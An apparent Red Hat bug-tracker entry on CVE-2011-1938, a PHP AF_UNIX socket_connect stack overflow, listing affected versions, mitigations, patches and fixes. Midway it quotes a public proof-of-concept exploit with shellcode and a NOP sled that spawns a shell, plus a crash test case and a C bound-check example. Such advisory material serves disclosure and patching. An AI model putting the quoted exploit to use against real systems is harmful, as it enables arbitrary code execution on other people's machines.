A stack-based buffer overflow flaw was found in the way the PHP socket extension opened connections to a particular address:port on the socket, when the AF_UNIX socket family was used. If a remote attacker could trick the local user into opening a connection to a specially-crafted address, it could lead to a PHP application crash, or, potentially, arbitrary code execution with the privileges of the user running the application.

Note: On Red Hat Enterprise Linux and Fedora the impact of this flaw would be mitigated by the FORTIFY_SOURCE protection mechanism to only a crash.

References:
[1] http://seclists.org/fulldisclosure/2011/May/472
[2] http://bugs.gentoo.org/show_bug.cgi?id=369071

Upstream patch:
[3] http://svn.php.net/viewvc?view=revision&revision=311369
This issue did not affect the versions of the php package, as shipped with Red Hat Enterprise Linux 4 and 5.

This issue affects the versions of the php53 package, as shipped with Red Hat Enterprise Linux 5.

This issue affects the versions of the php package, as shipped with Red Hat Enterprise Linux 6.

--

This issue affects the versions of the php package, as shipped with Fedora releases 13, 14 and 15.
Public PoC (from [1]):
======================

POC popping a shell:

-- cut --
<?php
echo "[+] CVE-2011-1938";
echo "[+] there we go...\n";

define('EVIL_SPACE_ADDR', "\xff\xff\xee\xb3");
define('EVIL_SPACE_SIZE', 1024*1024*8);

$SHELLCODE = "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0".
             "\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1".
             "\xcd\x80";

echo "[+] creating the sled.\n";
$CODE = str_repeat("\x90", EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ; $i < strlen($SHELLCODE) ; $i++, $j++) {
    $CODE[$j] = $SHELLCODE[$i];
}

$b = str_repeat("A", 196).EVIL_SPACE_ADDR;
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)\n";
$var85 = socket_connect($var79,$b);
?>
-- cut --
As noted above, this issue did not affect php packages in Red Hat Enterprise Linux 4 and 5. This problem was introduced in the following commit:

http://svn.php.net/viewvc?view=revision&revision=262814
http://bugs.php.net/bug.php?id=44127

It affects php53 packages in Red Hat Enterprise Linux 5 and php packages in Red Hat Enterprise Linux 6.

As mentioned above, this overflow is caught by FORTIFY_SOURCE in both affected versions. This reduces the impact of this issue to a crash / abort and blocks code execution. The impact is further reduced by the fact that this problem affects AF_UNIX sockets. It's a lot less likely for a PHP script to accept an arbitrary untrusted address (file path) when connecting using an AF_UNIX socket than when doing a network connection using AF_INET or AF_INET6 sockets.

(In reply to comment #0)
> Upstream patch:
> [3] http://svn.php.net/viewvc?view=revision&revision=311369

Correction of the above commit:
http://svn.php.net/viewvc?view=revision&revision=311370

(In reply to comment #3)
> Public PoC (from [1]):

Minimal test case without any payload, that can be used to verify the problem, can look as:

<?php
$sock = socket_create(AF_UNIX, SOCK_STREAM, 1);
var_dump(socket_connect($sock, str_repeat('A', 1024*1024)));
?>
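The defect class behind this CVE is a caller-supplied path copied into a fixed-size struct sockaddr_un on the stack without checking that it fits. The C below is an added example, not PHP's ext/sockets code or the upstream patch: fill_unix_addr (hypothetical name) performs the missing bound check and rejects the 1 MiB path from the minimal test case above instead of overflowing, with the unbounded variant shown only for contrast and never called.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Hardened variant: copy the path only if it fits in sun_path together
 * with the terminating NUL. Returns 0 on success, -1 if too long. */
int fill_unix_addr(struct sockaddr_un *out, const char *path, size_t len)
{
    memset(out, 0, sizeof(*out));
    if (len >= sizeof(out->sun_path))
        return -1;                      /* would overflow: refuse, like "Path too long" */
    out->sun_family = AF_UNIX;
    memcpy(out->sun_path, path, len);
    out->sun_path[len] = '\0';
    return 0;
}

/* Unbounded copy: the pattern the page describes. It writes past
 * sun_path (a stack object in the caller) whenever len >= sizeof(sun_path).
 * Kept only to contrast with the check above; the demo never calls it. */
int fill_unix_addr_unchecked(struct sockaddr_un *out, const char *path, size_t len)
{
    out->sun_family = AF_UNIX;
    memcpy(out->sun_path, path, len);   /* no length check */
    return 0;
}

/* Demo helper: try a constructed path of n 'A' characters, mirroring the
 * page's minimal test case str_repeat('A', 1024*1024). */
int try_path_of_length(size_t n)
{
    struct sockaddr_un addr;
    char *buf = malloc(n + 1);
    int rc;
    if (buf == NULL)
        return -2;
    memset(buf, 'A', n);
    buf[n] = '\0';
    rc = fill_unix_addr(&addr, buf, n);
    free(buf);
    return rc;
}

int main(void)
{
    printf("1 MiB path rejected: %s\n", try_path_of_length(1024 * 1024) == -1 ? "yes" : "no");
    printf("9-byte path accepted: %s\n", try_path_of_length(9) == 0 ? "yes" : "no");
    return 0;
}
```

On Linux sun_path is 108 bytes, so the check also rejects a 108-byte path (no room for the NUL) while accepting 107.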
This is corrected in upstream 5.3.7: http://www.php.net/archive/2011.php#id2011-08-18-1
This issue has been addressed in following products:

Red Hat Enterprise Linux 5
Red Hat Enterprise Linux 6

Via RHSA-2011:1423 https://rhn.redhat.com/errata/RHSA-2011-1423.html
Statement: Not vulnerable. This issue did not affect the versions of php as shipped with Red Hat Enterprise Linux 4 and 5. It has been addressed in Red Hat Enterprise Linux 5 (php53) and 6 (php).